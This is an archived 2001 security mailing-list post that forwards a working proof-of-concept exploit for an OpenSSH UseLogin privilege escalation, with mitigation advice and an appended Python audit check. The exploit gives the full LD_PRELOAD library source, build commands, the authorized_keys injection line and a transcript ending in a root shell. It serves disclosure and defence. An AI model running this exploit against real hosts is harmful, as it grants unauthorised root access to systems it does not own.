Subject: Fwd: OpenSSH UseLogin proof of concept exploit
To: None <tech-security@netbsd.org>
From: Lubomir Sedlacik <salo@Xtrmntr.org>
List: tech-security
Date: 12/06/2001 02:49:49
hi,
confirmed on:
NetBSD 1.5X - OpenSSH_2.9 NetBSD_Secure_Shell-20010624
NetBSD 1.5.2 - OpenSSH_2.5.1 NetBSD_Secure_Shell-20010614
everyone who uses "UseLogin yes" and has key authentication allowed for local
users, please at least set "UseLogin no" or comment it out.
----- Forwarded message from "[WaR]" <war@genhex.org> -----
Date: Thu, 6 Dec 2001 00:34:34 +0000
From: "[WaR]" <war@genhex.org>
To: vuln-dev@securityfocus.com
Subject: OpenSSH UseLogin proof of concept exploit
--[ OpenSSH UseLogin bug proof of concept exploit ]--
by [WaR] <war@genhex.org> / http://www.genhex.org
--[ Intro ]--
I was very curious in finding out how to exploit this problem. Although
I don't think anyone uses this feature, I looked into the matter anyway.
Here it goes. It was tested on the following platforms:
- Slackware 7.1 with OpenSSH3.0p1
- RedHat 7.1 with OpenSSH_2.9p2
- RedHat 7.2 with OpenSSH-3.0.1p1 (thx scorpio)
- OpenBSD 2.9 with OpenSSH_2.9 (thx pmsac)
The exploit should work as long as UseLogin does. YMMV.
This is based on libroot from squidge@onyx.infonexus.com,
published a few years ago for exploiting the telnetd LD_PRELOAD bug (and
you thought it wouldn't happen again...).
Kudos to pmsac@toxyn.org for his help figuring out the problem with
the Slackware UseLogin, testing on OpenBSD, and giving the idea for
the seteuid(0) (it originally was a system("/bin/sh");).
--[ Code ]--
Create a lib.c file with the next content:
---8<---
#include <stdio.h>
#include <sys/types.h>   /* uid_t */
#include <unistd.h>      /* seteuid() prototype */

/* Shadows libc's setuid() when this library is LD_PRELOADed into login:
   instead of dropping privileges it keeps the effective uid at 0. */
int setuid(uid_t uid){
    printf("setuid() called...\n");
    seteuid(0);
    return 0;
}
---8<---
Compile it into a library:
gcc -c -o lib.o lib.c
ld -shared -o libroot.so lib.o
chmod 755 ./libroot.so
Now, for the tricky (*g*) part...
You must have an account on the machine, and create an entry
on $HOME/.ssh/authorized_keys (or authorized_keys2) with:
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>
When sshd receives your connection, it will export this variable
into the environment *BEFORE* running login. Somewhere after this,
it executes a setuid. When it does, it makes a seteuid(0).
$ id
uid=1000(war) gid=100(users) groups=100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=0(root) gid=100(users) groups=100(users)
It also works remotely. Anyway, you _MUST_ have an account on
the victim machine so you can set up the environment, and login.
And obviously (duh) it must have UseLogin enabled.
That's all.
shout outs to Zav @ genhex.org, Smil3r, and everyone at phibernet.org.
-- [WaR]
"if you can't hack it, hit it with a hammer"
----- End forwarded message -----
regards,
-- 
-- Lubomir Sedlacik <salo@Xtrmntr.org>      ASCII Ribbon campaign against   /"\ --
--   <salo@silcnet.org>                     e-mail in gratuitous HTML and   \ / --
--                                          Microsoft proprietary formats    X  --
-- PGPkey: http://Xtrmntr.org/salo.pgp                                     / \ --
-- Key Fingerprint: DBEC 8BEC 9A90 ECEC 0FEF 716E 59CE B70B 7E3B 70E2         --
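An added audit check, not part of either message above, that looks for the two conditions the mail says must hold together: UseLogin enabled in sshd_config, and an authorized_keys entry whose environment= option injects a dynamic-loader variable. The sshd_config and authorized_keys contents are constructed samples; the option parser follows the quoting and comma rules of the authorized_keys option field.

```python
# Key-type tokens that begin the key field (prefix match also covers ecdsa-sha2-* and sk-* types).
KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-", "sk-")

def use_login_enabled(sshd_config):
    """sshd honours the first uncommented UseLogin line; keywords are case-insensitive."""
    for line in sshd_config.splitlines():
        parts = line.split("#", 1)[0].replace("=", " ", 1).split(None, 1)
        if len(parts) == 2 and parts[0].lower() == "uselogin":
            return parts[1].strip().lower() == "yes"
    return False  # the option defaults to "no"

def parse_options(line):
    """Return the option strings (quotes removed) that precede the key, or [] if there are none."""
    line = line.strip()
    if not line or line.startswith("#") or line.split()[0].startswith(KEY_TYPES):
        return []
    opts, cur, quoted, i = [], "", False, 0
    while i < len(line) and (quoted or not line[i].isspace()):  # whitespace ends the field
        c = line[i]
        if quoted and c == "\\" and i + 1 < len(line):  # backslash escape inside quotes
            cur += line[i + 1]; i += 1
        elif c == '"':
            quoted = not quoted
        elif c == "," and not quoted:
            opts.append(cur); cur = ""
        else:
            cur += c
        i += 1
    return opts + [cur]

def preload_env_options(authorized_keys):
    """(line_no, option) for every environment= option that sets a dynamic-loader variable."""
    hits = []
    for n, line in enumerate(authorized_keys.splitlines(), 1):
        for opt in parse_options(line):
            if opt.lower().startswith("environment="):
                var = opt.split("=", 2)[1].upper()
                if var.startswith(("LD_", "DYLD_")):
                    hits.append((n, opt))
    return hits

def exposed(sshd_config, authorized_keys):
    """Both conditions from the mail must hold: UseLogin yes and a key line that preloads a library."""
    return use_login_enabled(sshd_config) and bool(preload_env_options(authorized_keys))

# Constructed samples, not taken from any real host; line 3 of the key file mirrors the mail's entry.
SSHD_CONFIG = "Port 22\nUseLogin yes\n"
AUTHORIZED_KEYS = """# constructed authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQAB== plain@example
environment="LD_PRELOAD=/home/war/libroot.so" ssh-dss AAAAB3NzaC1kc3M= war@localhost
from="10.0.0.0/8",environment="EDITOR=vi",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQAB== ok@example"""
```

Later OpenSSH releases only honour environment= in authorized_keys when PermitUserEnvironment is set, and UseLogin was removed entirely in OpenSSH 7.4, so on a current host the key-file check is the one still worth running.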